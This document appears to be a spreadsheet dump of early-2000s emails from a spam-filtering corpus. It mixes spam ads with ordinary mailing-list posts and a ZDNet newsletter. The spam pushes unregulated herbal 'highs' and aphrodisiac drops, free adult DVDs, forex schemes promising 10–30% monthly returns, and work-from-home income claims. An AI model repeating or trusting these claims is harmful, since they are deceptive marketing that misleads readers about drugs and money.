 All Exotic Botanical Resource Product are intended for sophisticated adult usage. No Exotic Botanical Resource product is intended for use during pregnancy and although no factor or product is regulated or illegal, it is the mandatory ethical policy of Exotic Botanical Resources that no XBR product be sold or offered to any person that has not attained at least 21 years of age.  All things in their time.
 A) NORTH INTRO OFFER -- Includes the following:
 * One 1/4 lb. can of Shangrila Zowie Wowie
 (incl. hookah &amp; herb pipe) 
 * One 300 count container of Prozaka tablets
 PRICE:  $180.00 (Reg. price $280 - you SAVE $100)
 B) SOUTH INTRO OFFER -- Includes the following:
 * One 1/4 lb. can of Shangrila Zowie Wowie 
 (incl. hookah &amp; herb pipe) 
 * One 300 count jar Gentle Ferocity tablets
 PRICE:  $190.00 (Reg. price $280. You save $90)
 C) EAST INTRO OFFER -- Includes the following:
 * One 1/4 lb. can of Shangrila Zowie Wowie
 (incl. hookah &amp; herb pipe) 
 * One 1 oz. bottle of Sweet Vjestika Aphrodisia Drops 
 PRICE:  $170.00 (Reg. price $240. You save $70)
 D) WEST INTRO OFFER -- Includes the following:
 * One 1/4 lb. can of Shangrila Zowie Wowie 
 (incl. hookah &amp; herb pipe)
 * One 2 oz. bottle of Aqueous Kathmandu 
 PRICE:  $170.00 (Reg. price $265. You save $95)
 E) WET INTRO OFFER -- Includes the following:
 * One 2 oz. bottle of Aqueous Kathmandu
 * One 1 oz. bottle of  Sweet Vjestika Aphrodisia Drops
 PRICE:  $145.00 (Reg. price $205. You save $60)
 F) APHRODISIA INTRO OFFER -- Includes the following:
 * One 1/4 lb. can of Shangrila Zowie Wowie 
 (incl. hookah &amp; herb pipe)
 * One 1 oz. bottle of  Sweet Vjestika Aphrodisia Drops
 PRICE:  $150.00 (Reg. price $240. You save $90)
 G) MINI INTRO OFFER -- Includes the following:
 * One 1 oz. bag of Shangrila Zowie Wowie 
 (incl. herb pipe only)
 * One 100 count container of Prozaka tablets
 PRICE:  $110.00 (Reg. price  $135. You save $25)
 H) VISIONARY INTRO OFFER -- Includes the following:
 * One 1/4 lb. can of Shangrila Zowie Wowie
 (incl. hookah &amp; herb pipe)
 * One 300 count container of Prozaka tablets
 * One 300 count Gentle Ferocity tablets
 * One 1 oz. bottle of  Sweet Vjestika Aphrodisia Drops
 * One 2 oz. bottle of Aqueous Kathmandu 
 PRICE:  $310.00 (Reg. price $615. You save $305)
 **********************************************************************
 To order via credit card or for customer 
 assistance &amp; product information, please call: 
 1-623-972-5999 
 Hours: Mon. - Sat. 10 a.m. to 9 p.m. Central Time
 All orders are shipped next day via US Postal domestic and international Priority Mail.
 Beyond business hours, please enjoy automated convenience.  Leave your name and phone number and a convenient time to return your call.  Certainly, we will be happy to do so.
 ***********************************************************************
 To remove your address from our list, click on the following link and send a blank email.  mailto:bm7@btamail.net.cn?subject=Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Adult DVDs. No purchase necessary... To: yyyy@netnoteinc.com ID: ksdk
</t>
  </si>
  <si>
    <t xml:space="preserve">To: yyyy@netnoteinc.com
 ############################################
 #                                          #
 #       Adult Online Super Store           #
 #              Shhhhhh...                  #
 #     You just found the Internet's        #
 #          BEST KEPT SECRET!!!             #
 #    3 Vivid DVDs Absolutely FREE!!!       #
 #                                          #
 ############################################
 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 If you haven't seen it yet... we are offering a
 new weekly selection absolutely FREE Adult DVDs
 AND VIDEOS NO PURCHASE NECESSARY!!!!!
  GO TO: http://209.203.162.20/8230/
 Everything must go!!! Additional Titles as
 low as $6.97
 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 ############################################
 #                                          #
 #  Don't forget to forward this email to   #
 #  all your friends for the same deal...   #
 #  There is a new free DVD and VHS video   #
 #  available every week for your viewing   #
 #  pleasure.                               #
 #                                          #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http://209.203.162.20/optout.html 
 . Please allow 24 hours for removal.
 This e-mail is sent in compliance with the Information Exchange Promotion 
 and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 
 'removal' instruction.
 faarakxavoxcadetxjpir
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Foreign Currency Trading Report
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;FONT face=3D"MS Sans Serif"&gt;
 &lt;FONT size=3D2&gt; &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//=
 EN"&gt;&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Untitled Document&lt;/TITLE&gt;&lt;META http-equiv=3DContent=
 -Type content=3D"text/html; charset=3Dwindows-1252"&gt;&lt;META content=3D"MSHTM=
 L 5.50.4611.1300" name=3DGENERATOR&gt;&lt;/HEAD&gt;&lt;BODY bgColor=3D#ffffff&gt;&lt;DIV ali=
 gn=3Dcenter&gt;&lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D620 border=3D0&gt;=
   &lt;TBODY&gt;  &lt;TR&gt;      &lt;TD width=3D100&gt;&lt;BR&gt;        &lt;BR&gt;&lt;/TD&gt;    &lt;TD width=3D=
 437&gt;        &lt;DIV align=3Dcenter&gt;           &lt;H1&gt;&lt;FONT face=3D"Times New Rom=
 an, Times, serif" color=3D#000066&gt;&lt;B&gt;&lt;I&gt;&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;I&gt;&lt;B&gt;&lt;img src=3D"h=
 ttp://211.152.134.203/~inbox002/bank.jpg" width=3D"550" height=3D"172"&gt;&lt;/B=
 &gt;&lt;/I&gt;&lt;/H1&gt;        &lt;/DIV&gt;&lt;/TD&gt;      &lt;TD vAlign=3Dtop width=3D83&gt;&amp;nbsp;&lt;/TD&gt;=
     &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D62=
 1 border=3D0&gt;  &lt;TBODY&gt;  &lt;TR&gt;    &lt;TD&gt;      &lt;DIV align=3Dcenter&gt;      &lt;HR&gt;  =
         &lt;FONT face=3D"Times New Roman, Times, serif"&gt;&lt;B&gt;&lt;FONT color=3D#000=
 0cc size=3D4&gt;Volume Over 1.2 Trillion Dollars a Day&lt;BR&gt;          &lt;FONT col=
 or=3D#000000 size=3D5&gt;Tap into the high-income       opportunity found in =
 the World's largest financial       market.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;      =
  &lt;P align=3Dcenter&gt;&lt;FONT face=3D"Times New Roman, Times, serif" color=3D#f=
 f0000 size=3D6&gt;&lt;B&gt;&lt;FONT color=3D#0000cc&gt;The&lt;/FONT&gt; Foreign Currency &lt;FONT =
 color=3D#0000cc&gt;Markets&lt;/FONT&gt; &lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;      &lt;HR width=3D560&gt;  =
     &lt;FONT face=3D"Times New Roman, Times, serif" color=3D#0000cc size=3D4&gt;=
 &lt;B&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;      &lt;BLOCKQUOTE&gt;        &lt;DIV align=3Dleft&gt;        &lt;P=
 &gt;&lt;FONT face=3D"Times New Roman, Times, serif" color=3D#0000cc size=3D4&gt;&lt;B&gt;=
 Discover how:&lt;BR&gt;              &lt;FONT color=3D#000066&gt;$20,000 "properly pos=
 itioned" in the Euro vs.               the US Dollar, on 12/13/00 could ha=
 ve returned $70,000 on 1/03/01&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;            &lt;P align=3D=
 "center"&gt;&lt;FONT face=3D"Times New Roman, Times, serif" color=3D#000066 size=
 =3D4&gt;&lt;B&gt;Learn how successful professional traders assisting you can potent=
 ially achieve double-digit monthly returns of 10-30% or more!&lt;/B&gt;&lt;/FONT&gt;&lt;/=
 P&gt;          &lt;DIV align=3Dcenter&gt;&lt;FONT size=3D5&gt;&lt;A href=3D"http://211.152.1=
 34.203/~inbox002/signupform.htm"&gt;       &lt;FONT color=3D#0000ff&gt;Click Here&lt;/=
 FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;
       &lt;/DIV&gt;      &lt;DIV align=3Dcenter&gt;      &lt;HR&gt;            &lt;p&gt;&lt;FONT face=3D=
 "Times New Roman, Times, serif" color=3D#0000cc size=3D4&gt;&lt;B&gt;&lt;font color=3D=
 "#000066"&gt;For              a &lt;font color=3D"#0000FF"&gt;Free Foreign Currency=
  Trading Newsletter&lt;/font&gt;               and a comprehensive report on the=
  foreign currency markets.&lt;/font&gt;&lt;/B&gt;&lt;/font&gt;&lt;/p&gt;            &lt;p&gt;&lt;FONT face=3D=
 "Times New Roman, Times, serif" color=3D#0000cc size=3D4&gt;&lt;B&gt;&lt;font color=3D=
 "#000066"&gt;Click on the link below. &lt;/font&gt;&lt;/B&gt;&lt;/font&gt;&lt;/p&gt;          &lt;FONT f=
 ace=3D"Times New Roman, Times, serif" color=3D#0000cc size=3D4&gt;      &lt;P&gt;  =
     &lt;DIV align=3Dcenter&gt;&lt;FONT size=3D5&gt;&lt;A href=3D"http://211.152.134.203/~=
 inbox002/signupform.htm"&gt;&lt;FONT color=3D#0000ff&gt;Click Here&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT=
 &gt;      &lt;P&gt;&lt;/P&gt;      &lt;/DIV&gt;      &lt;HR&gt;       &lt;DIV align=3Dcenter&gt;&lt;FONT face=3D=
 "Times New Roman, Times, serif" color=3D#0000cc size=3D1&gt;&lt;FONT color=3D#00=
 0000 size=3D1&gt;&lt;B&gt;There is considerable exposure to risk in any Forex (FX) =
 transaction. Before deciding to         participate in FX trading,&lt;BR&gt;you =
 should carefully consider your         objectives, level of experience and=
  risk appetite. Most importantly         don't invest money &lt;BR&gt;you can't =
 afford to       lose.&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/font&gt;&lt;/BLOCKQUOTE&gt;&lt;FONT fac=
 e=3D"Times New Roman, Times, serif" color=3D#0000cc size=3D4&gt;      &lt;DIV al=
 ign=3Dcenter&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#000000 s=
 ize=3D1&gt;&lt;B&gt;If you are receiving this e-mail in error, we sincerely apologi=
 ze. Simply click on Reply Remove in the subject line. We Honor any and all=
  Remove Requests. Any attempt to disable this Remove acct will only preven=
 t others from being removed. Again, we  apologize for any inconvenience an=
 d it wont happen again.     &lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On 24 Jul 2002, Luis Villa wrote:
 --]The report, apparently, makes that point as well. Tom seems to have
 --]taken things a slight bit out of context. :)
 I was simply posting, I did nto even comment of the fsking thing. So back
 the F off biotches.
 Jezz, add too much and they jump on you , dont add anything but your name
 and they fill in thier own versions....Two fingers in the air.
 I LOVE YOU ALL.
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Double Coverage Amount, Same Payment...                  UYZ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</si>
  <si>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href=3D"http://213.139.76.142/lx/termquotes/473400/"&gt;&lt;font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href=3D"http://213.139.76.142/lx/termquotes/473400/"&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 referral-agent
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: eBay PowerSeller Secrets                         6826
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;
 charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;table width="58%" height="218"&gt;
   &lt;tr valign="top"&gt;
     &lt;td height="211"&gt;
       &lt;p&gt;&lt;font size="3"&gt;&lt;b&gt;Fortunes are literally being made in this great new
         marketplace!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;O&lt;font size="3"&gt;&lt;/font&gt;&lt;font size="3"&gt;ver &lt;b&gt;$9 Billion&lt;/b&gt; in merchandise
         was sold on &lt;b&gt;eBay&lt;/b&gt; in 2001 by people just like you - &lt;u&gt;right from
         their homes&lt;/u&gt;! &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="3"&gt;Now you too can learn the secrets of &lt;b&gt;successful selling
         &lt;/b&gt;on&lt;b&gt; eBay&lt;/b&gt; and &lt;b&gt;make a staggering income&lt;/b&gt; from the comfort
         of &lt;b&gt;your own home&lt;/b&gt;. If you are &lt;b&gt;motivated&lt;/b&gt;, capable of having
         an&lt;b&gt; open mind&lt;/b&gt;, and can follow simple directions, then &lt;a href="http://www.generaledu.com/ebaymktg"&gt;visit
         us here&lt;/a&gt;. &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2"&gt; If you are not interested in future offers &lt;a href="http://www.generaledu.com/remove.html"&gt;go
         here.&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp; &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp; &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;html&gt;&lt;p&gt;&lt;head&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Stupid for a Day
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000202.html
 Date: 2002-09-29T12:01:43-08:00
 I like Kasia's latest idea. Let's all try that. But not on the same day. Maybe 
 we should all use our birthdays as the basis. Since I was born on June 4th, 
 I'll be stupid on the 4th of every...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: bad focus/click behaviours
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I am a (tv)twm user. when I snarf text into my mouse cut buffer, and then
 attempt to inject it into the exmh input windows for comp/repl, the 'point'
 is often an apparently random place in the text pane, not where I think I
 have current flashing cursor. 
 I usually wipe out any of To:/Subject:/&lt;random body&gt; with the text. Its
 often not even beginning of line denoted, ie its an unexplicable number
 of char spaces in to the text where it inserts, 
 What am I doing wrong in either X, WM, shell, EXMH which is causing this?
 cheers
 	-George
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Definitional nit to pick:
 Robert Harley writes:
 &gt; It is perfectly obvious that (heterosexual) promiscuity is exactly,
 &gt; precisely identical between males and females.
 &gt; 
 &gt; Of course the shapes of the distributions may differ.
 You've redefined "promiscuity" above as "total" or "average" 
 activity, which seems to rob it of its common meaning: 
 activity above some specific threshold (usually "one") or 
 norm, or involving extra or indiscriminate variety. 
 "Promiscuity" is thus inherently a description of 
 distributions rather than averages.
 Consider a population of 3 males and 3 females. Let
 there be three pairings which result in each person
 having sex once. Then, let one of the males also have 
 sex with the other two females. 
 Sure, the average number of sex acts and sex partners
 is equal between the sexes, tautologically. 
 But here more women than men are:
  - above the single partner threshold
  - above the overall average 1.67 acts/partners threshold
  - above the overall median 1.5 acts/partners
  - above the overall mode 1 acts/partners
 And here women have a higher mode (2) and median (2) 
 number of partners.
 So in this contrived population, females are more 
 "promiscuous" than males, unless "promiscuity" is 
 defined uselessly.
 - Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Apt-get question
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All Folks,
 I have 'APT' installed and updated from 'freshmeat.net.  But I failed using it
 # apt-get install 
 /mnt/cdrom/Linux/CDBurner/cdrtools-cdrecord-1.11a23-1.i386.rpm
 Processing File Dependencies... Done
 Reading Package Lists... Done
 Building Dependency Tree... Done
 E: Couldn't find package 
 /mnt/cdrom/Linux/CDBurner/cdrtools-cdrecord-1.11a23-1.i386.rpm
 The file 'cdrtools-cdrecord-1.11a23-1.i386.rpm' is there
 I performed another test copying the file 
 'cdrtools-cdrecord-1.11a23-1.i386.rpm' to /root/Download
 # apt-get install /root/Download/cdrtools-cdrecord-1.11a23-1.i386.rpm
 Processing File Dependencies... Done
 Reading Package Lists... Done
 Building Dependency Tree... Done
 E: Couldn't find package /root/Download/cdrtools-cdrecord-1.11a23-1.i386.rpm
 Still failed.  Finally I rpm 'cdrtools-cdrecord-1.11a23-1.i386.rpm' from the 
 CD and suceeded.
 Kindly advise what mistake I have committed.
 Thanks in advance.
 Stephen Liu
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: zzzz, Is Your web Site Making Money! 2:18:15 PM 8/25/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">IS YOUR BUSINESS MAKING MONEY!
 Set Up To Accept Credit Cards Today!
 No Obligation Consultation!
 No Set Up Fees
 No Application Fees
 All Credit Types Accepted
 Retail Rates as Low as 1.60%
 Mail Order Rates As Low as 2.30%
 Set Up Your Merchant Account within 48 Hours
 NO CANCELLATION FEES
 No Money Down
 No Reprogramming Fees
 We Will Beat Anybodys Deal By 15%
 We make it easy and affordable to start accepting Credit Cards today.
 99% of our applicants are approved!
 THIS IS NOT AN OFFER TO OBTAIN A CREDIT CARD!
 US RESIDENTS ONLY!
 http://servicesma.com/leads.htm
 To Unsubscribe, Please Click 
 http://www.servicesma.com/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Razor with sendmail
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm after a recipe for using Razor with Sendmail. Unfortunately, I can't 
 get Procmail on my hosting but I do have full access to the Sendmail 
 alias list.
 Can anyone point me at some docs for this as I couldn't find anything in 
 the Razor docs.
 -- 
 Julian Bond Email&amp;MSM: julian.bond@voidstar.com
 Webmaster:              http://www.ecademy.com/
 Personal WebLog:       http://www.voidstar.com/
 CV/Resume:          http://www.voidstar.com/cv/
 M: +44 (0)77 5907 2173   T: +44 (0)192 0412 433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</si>
  <si>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Recommended Viewing
</t>
  </si>
  <si>
    <t xml:space="preserve">dreams-are-like-radio analogy: i program my Jetta Monsoon for Planet 93.3,
 80's 102.9, and NPR 89.9 but when i leave my local broadcast range i have to
 scan for new stations. dreaming is outside my local broadcast range.
 -----Original Message-----
 From: garym@maya.dyndns.org [mailto:garym@maya.dyndns.org]On Behalf Of
 Gary Lawrence Murphy
 Sent: Tuesday, September 10, 2002 10:14 AM
 To: Geege Schuman
 Cc: johnhall@evergo.net; FoRK
 Subject: Re: Recommended Viewing
 &gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman &lt;geege@barrera.org&gt; writes:
     G&gt; you meant "SURPRISINGLY perceptive," didn't you?  :-)
 Of course, dear.  Especially without zazen training.  Veritably
 Operational Thetan-like.
     G&gt; recent exceptionally vivid and strange dreams lead me to
     G&gt; believe i'm sparking synapses that have lain dormant lo these
     G&gt; many years.  Lots of problem solving going on up there at
     G&gt; night.
 It's a myth that we don't use parts of our brain.  We use it all,
 always.  It's just that our culturally-induced focal-point causes most
 of us to most of the time ignore and waste 99.999% of it.  "Lucid" is
 a measure of notch-filter bandwidth; all stations are broadcasting,
 but we only /choose/ Easy Rock 105.
 For example, don't look now but your shoes are full of feet.
 The sensation of toes the above statement evokes is not a "turning on"
 of circuits, it is a "tuning in".  The next step, of course, is to
 "drop out" :)
 To paraphrase an old saw: Life is wasted on the living.
 --
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Why we're changing our publishing schedule [ANCHORDESK]
</t>
  </si>
  <si>
    <t xml:space="preserve">
         &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;ZDNet AnchorDesk Newsletter&lt;/title&gt;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href="http://clickthru.online.com/Click?q=1e-JQuLI4jWh9qqqwyqEsB8LE27qd4R" &gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/hd_anchor.gif" width="600" height="60" border="0"  alt="AnchorDesk Weekly"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;!--
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;
 &lt;br&gt;
       &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2766" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;br&gt;
 &lt;/td&gt;
 --&gt;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width=588 bgcolor="#ffffff"&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=588 bgcolor="#ffffff"&gt;
                         &lt;tr valign=top&gt;
                         &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td valign="top" width=550&gt;
                         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;&lt;br&gt;
                                 &lt;font face="Arial, Helvetica" size="-2"&gt;TUESDAY, JULY 16, 2002&lt;/font&gt;&lt;br&gt;                                                        
                         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="4"&gt;&lt;br&gt;
                         &lt;font face="Arial, Helvetica" size="-1"&gt;
 &lt;table width="100%" cellpadding="0" border="0" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td valign="top" width="100%"&gt;
 &lt;img src="http://www.zdnet.com/graphics/anchordesk/homepage/title/coursey_david.gif" width="548" height="17"&gt;
    &lt;table cellpadding=0 cellspacing=0 border=0 width=83 align=left&gt;
       &lt;tr valign=top&gt;
          &lt;td&gt;
              &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/authors/144.gif" alt="David Coursey" width="75" height="105" border="0"&gt;
          &lt;/td&gt;
       &lt;/tr&gt;
    &lt;/table&gt;
 &lt;!--
    &lt;table cellpadding=0 cellspacing=0 border=0&gt;
       &lt;tr&gt;
           &lt;td bgcolor="#fff49f"&gt;
              &lt;font face="Arial, Helvetica" size="-1"&gt;
                 &lt;b&gt;&amp;nbsp;David Coursey&lt;/b&gt;
              &lt;/font&gt;
           &lt;/td&gt;
           &lt;td&gt;
              &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/trim_yellow.gif" width="23" height="15" border="0"&gt;
           &lt;/td&gt;
       &lt;/tr&gt;
    &lt;/table&gt;
    &lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
       &lt;tr&gt;
          &lt;td bgcolor="#fff49f"&gt;
             &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;
          &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
          &lt;td&gt;
             &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=5 width=1&gt;
          &lt;/td&gt;
       &lt;/tr&gt;
    &lt;/table&gt;
 --&gt;
    &lt;br&gt;
    &lt;font size="3"&gt;&lt;b&gt;Why we're changing our publishing schedule&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 Dear Reader,
 &lt;p&gt;
 As of Monday, July 15, AnchorDesk is being published on Mondays, Wednesdays, and Fridays, instead of five days a week. The AnchorDesk Weekly newsletter will continued to be published every Friday
 &lt;p&gt;
 Why are we doing this? There are several reasons, but the most important one is giving me a chance do more than just sit behind a desk typing all day in order to meet deadlines.  I've been writing five columns a week for 18 months now, and I'd be lying to you if I didn't admit to being more than a little tired.  
 &lt;p&gt;
 Also, I've been on such a short leash that I haven't been able to travel or meet as many people as I'd like. This new schedule means I'll have more time to get out, learn more, see more products, and discover new issues or trends. So it should result in a more interesting and useful AnchorDesk for you.
 &lt;p&gt;
 Having additional time also means I will be able to work on several projects I've been assigned, including one that could bear fruit at the Consumer Electronics Show next January. More about that soon, once all the details are nailed down.
 &lt;p&gt;
 For now, the new schedule is being called a "test," which means it could turn out to be temporary--or maybe not. We'll run it through the end of the summer and see how it works. 
 &lt;p&gt;
 I appreciate your continued support of AnchorDesk. While the column will be less frequent, I will still be on &lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd8ldb3QT23_tvVyn4IcgyR" &gt;CNET Radio&lt;/a&gt; every weekday at noon PT (or on-demand streaming anytime) and hope you will join me there.
 &lt;p&gt;
 Sincerely,
 &lt;p&gt;
 David Coursey&lt;br&gt;
 Executive Editor&lt;br&gt;
 AnchorDesk
    &lt;p&gt;
    &lt;br&gt;
    &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;
    &lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;
                 &lt;tr&gt;
 &lt;td bgcolor="#cccccc"&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" width="100%"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
          &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=1 height=10&gt;&lt;br&gt;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href='http://clickthru.online.com/Click?q=49-ZMeczjprfiQ3nz5mcyZDcZEanJRCYsRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0656szMrehsnStcVTQzc9R" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtE5cttyGT8UEE0WNrUZcR"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href="http://clickthru.online.com/Click?q=88-ec5PQQKxb5ofGTz-rU358atSBbiR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQnKR5PgGHSCN0U7nQUD4R" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTCrVd7ieAE64qDAwrPGrR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzzbv36i-MKE-nFr99H2iR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTbVg_78GZP85eXsJh-PR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqr33g_S0pvVdi5Z7ednR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvUtgu8OiqzUbrvLkiDeR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T83lOP5n9kgGa2oXqGyR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsVa7BqadyLxjkqVAXXblR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e501-01&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td 